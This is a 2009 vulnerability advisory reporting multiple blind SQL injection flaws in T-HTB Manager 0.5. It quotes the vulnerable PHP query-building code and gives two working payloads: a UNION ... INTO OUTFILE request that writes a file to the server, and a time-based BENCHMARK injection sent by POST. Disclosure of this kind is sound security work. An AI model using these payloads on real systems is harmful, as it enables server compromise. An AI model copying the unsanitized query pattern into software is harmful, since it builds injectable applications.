T-HTB Manager Mutiple Blind SQL Injection Sep 10 2009 03:56PM
Salvatore Fresta aka Drosophila (drosophilaxxx gmail com)

******** Salvatore "drosophila" Fresta ********

[+] Application: T-HTB Manager
[+] Version: 0.5
[+] Website: http://sourceforge.net/apps/mediawiki/t-htbmanager/index.php?title=Main_
Page

[+] Bugs: [A] Multiple Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 10 Sep 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com

***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***************************************************

[+] Bugs

- [A] Multiple Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: index.php

All fields in this script are not sanitized but any
outputs aren't returned.

...

case 'delete_category':
$id = $_GET['id'];
$id_interfaces = $_GET['id_interfaces'];

if($id>0)
{
$query = "SELECT rgt, lft FROM ".$table_name." WHERE id='" . $id . "'";
$db_query = mysql_query($query);

...

case 'update_category':

$name = $_POST['name'];
$id = $_POST['id'];

$rate = $_POST['rate'];
$ceil = $_POST['ceil'];
$burst = $_POST['burst'];
$prio = $_POST['prio'];
$monitor = $_POST['monitor'];

if(strlen($name)>0 && $id>0)
{
$nodelft = $_POST['nodelft'];

$lft = $_POST['lft'];
$rgt = $_POST['rgt'];

$query = "UPDATE ".$table_name." set name='" . $name . "' , lft='" . $lft . "' , rgt = '" . $rgt . "', rate= '" . $rate . "', ceil = '" . $ceil . "', burst = '" . $burst . "', prio = '" . $prio . "', monitor = '" . $monitor . "' WHERE id='" . $id . "'";

...

And many others..

***************************************************

[+] Code

- [A] Multiple Blind SQL Injection

This is a Blind SQL Injection bug but into the
database there aren't very reserved information
such as usernames and/or passwords. However this
injection can be used to write arbitrary files
on the server (when allowed).

http://site/path/index.php?action=delete_category&id=1' UNION ALL SELECT NULL,'evil code' INTO OUTFILE '/tmp/file.php

Send it as a POST packet:

action=update_category&id=9999&name=blabla' WHERE 1=0 OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23

***************************************************

[+] Fix

No fix.

***************************************************

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus